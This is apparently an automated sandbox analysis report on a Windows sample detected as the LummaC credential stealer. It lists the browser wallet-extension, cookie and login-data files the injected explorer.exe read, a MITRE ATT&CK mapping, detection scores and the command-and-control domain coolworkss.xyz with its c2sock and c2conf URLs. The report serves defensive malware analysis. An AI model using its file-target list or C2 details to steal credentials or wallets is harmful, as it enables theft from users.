Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Source: Yara match

File source: Process Memory Space: explorer.exe PID: 5632, type: MEMORYSTR

Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\Outlook Files	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\ZQIXMVQGAH	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: explorer.exe PID: 5632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7020, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	22 Native API	1 DLL Side-Loading	412 Process Injection	11 Masquerading	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	12 Virtualization/Sandbox Evasion	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	21 Data from Local System	Exfiltration Over Bluetooth	2 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	412 Process Injection	Security Account Manager	12 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Deobfuscate/Decode Files or Information	NTDS	12 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	14 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Software Packing	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	11 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	232 System Information Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
lJ2eYRm0Bd.exe	21%	ReversingLabs	Win64.Trojan.Generic

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\kheeknpom	100%	Avira	TR/Spy.Agent.elwjq
C:\Users\user\AppData\Local\Temp\kheeknpom	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\kheeknpom	83%	ReversingLabs	Win32.Trojan.LummaStealer

Source	Detection	Scanner	Label
http://www.3waylabs.com/nw/WWW/products/wizcon/vt220.html	0%	URL Reputation	safe
http://mths.be/punycode	0%	URL Reputation	safe
http://foo.com	0%	URL Reputation	safe
http://coolworkss.xyz/r	100%	Avira URL Cloud	malware
http://coolworkss.xyz/c2sockO	100%	Avira URL Cloud	malware
http://coolworkss.xyz/c2sock_	100%	Avira URL Cloud	malware
http://coolworkss.xyz/c2sock?	100%	Avira URL Cloud	phishing
http://crl3.digicert.co(m/D	0%	Avira URL Cloud	safe
http://coolworkss.xyz/44s	100%	Avira URL Cloud	malware
http://coolworkss.xyz/c2sock	100%	Avira URL Cloud	phishing
http://coolworkss.xyz:80/c2socka	100%	Avira URL Cloud	malware
http://coolworkss.xyz/c2sock/	100%	Avira URL Cloud	phishing
http://coolworkss.xyz/c2sock3	100%	Avira URL Cloud	malware
http://coolworkss.xyz:80/c2sock	100%	Avira URL Cloud	phishing
http://narwhaljs.org)	0%	Avira URL Cloud	safe
http://coolworkss.xyz/5	100%	Avira URL Cloud	malware
http://coolworkss.xyz/c2sock:	100%	Avira URL Cloud	malware
http://coolworkss.xyz/U	100%	Avira URL Cloud	malware
https://wwf.org	0%	Avira URL Cloud	safe
http://c0rl.m%L	0%	Avira URL Cloud	safe
https://wwf.org/	0%	Avira URL Cloud	safe
http://coolworkss.xyz/yO3GNZ	100%	Avira URL Cloud	malware
http://coolworkss.xyz/c2conf	100%	Avira URL Cloud	phishing
https://api.freshaddress.biz/js/lib/freshaddress-client-7.0.min.js?token=6075cbbd36a1f0f92cddb595415	0%	Avira URL Cloud	safe
http://coolworkss.xyz/	100%	Avira URL Cloud	malware
http://coolworkss.xyz:80/c2sock;	100%	Avira URL Cloud	phishing
http://coolworkss.xyz/c2sockw	100%	Avira URL Cloud	malware
http://coolworkss.xyz/c2sockt	100%	Avira URL Cloud	malware
http://coolworkss.xyz/c2socky	100%	Avira URL Cloud	malware
http://pod.tst.eu/http://cvs.schmorp.de/libev/ev.pod#Be_smart_about_timeouts	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.worldwildlife.org	104.18.6.94	true	false	high
wwf.org	104.18.6.142	true	false	unknown
coolworkss.xyz	172.67.195.229	true	true	unknown
ipv4.imgur.map.fastly.net	199.232.32.193	true	false	unknown
i.imgur.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://wwf.org/	false	Avira URL Cloud: safe	unknown
http://coolworkss.xyz/c2sock	true	Avira URL Cloud: phishing	unknown
https://www.worldwildlife.org/?utm_campaign=301-redirects&utm_source=wwf.org&utm_medium=referral&utm_content=wwf.org	false		high
https://i.imgur.com/2lsHcHC.png	false		high
http://coolworkss.xyz/	true	Avira URL Cloud: malware	unknown
http://coolworkss.xyz/c2conf	true	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://coolworkss.xyz/c2sock_	explorer.exe, 00000013.00000002.455543101.00000000059D0000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://duckduckgo.com/chrome_newtab	explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://insanecoding.blogspot.com/2007/11/pathmax-simply-isnt.html	lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://i.imgur.com/2lsHcHC.png;https://i.ibb.co/93gBLW7/1552130165.png	lJ2eYRm0Bd.exe, 00000000.00000003.217524808.0000000000600000.00000004.00000020.00020000.00000000.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282113949.00000000028DC000.00000004.00000020.00020000.00000000.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.281956590.0000000000600000.00000004.00000020.00020000.00000000.sdmp	false		high
https://i.imgur.com/2lsHcHC.pnge	lJ2eYRm0Bd.exe, 00000000.00000002.281956590.0000000000600000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmp	false		high
https://github.com/joyent/node/issues/3295.	lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.vmware.com/0	lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://wwf.org	lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://coolworkss.xyz/r	explorer.exe, 00000013.00000002.455198443.0000000003367000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://nodejs.org/	lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/joyent/node/issues/1726	lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://coolworkss.xyz:80/c2socka	explorer.exe, 00000013.00000003.391823528.0000000003367000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://daniel.haxx.se/blog/2011/02/21/localhost-hack-on-windows/	lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.worldwildlife.org/pages/state-disclosures	lJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://coolworkss.xyz/44s	explorer.exe, 00000013.00000003.355913652.0000000003336000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.ecma-international.org/publications/standards/Ecma-262.htm)	lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://code.google.com/p/v8/wiki/DebuggerProtocol	lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl3.digicert.co(m/D	lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003530000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://search.yahoo.com?fr=crmas_sfpf	explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://coolworkss.xyz/c2sockO	explorer.exe, 00000013.00000003.363893394.0000000003388000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.362220178.0000000003388000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.3waylabs.com/nw/WWW/products/wizcon/vt220.html	lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.worldwildlife.org/stories	lJ2eYRm0Bd.exe, 00000000.00000002.282059404.0000000002125000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/search?q=.net	explorer.exe, 00000013.00000002.455599716.0000000005C86000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.worldwildlife.org/about/	lJ2eYRm0Bd.exe, 00000000.00000002.282059404.0000000002125000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.openssl.org/support/faq.html	lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp	false		high
http://invisible-island.net/xterm/ctlseqs/ctlseqs.html	lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	explorer.exe, 00000013.00000002.455198443.0000000003388000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.worldwildlife.org/pages/privacy-policy	lJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://coolworkss.xyz/c2sock?	explorer.exe, 00000013.00000002.455543101.00000000059D0000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://fca7603378a4e3ebeab2-4e03b1ac88f27f7b20b4cf232f717383.ssl.cf1.rackcdn.com/photos/social/land	lJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.worldwildlife.org/about/history	lJ2eYRm0Bd.exe, 00000000.00000002.282059404.0000000002125000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.worldwildlife.org/leaders	lJ2eYRm0Bd.exe, 00000000.00000002.282059404.0000000002125000.00000004.00000020.00020000.00000000.sdmp	false		high
http://wiki.commonjs.org/wiki/Unit_Testing/1.0	lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://coolworkss.xyz/c2sock/	explorer.exe, 00000013.00000003.353007918.0000000003388000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://www.worldwildlife.org/about/contact	lJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmp	false		high
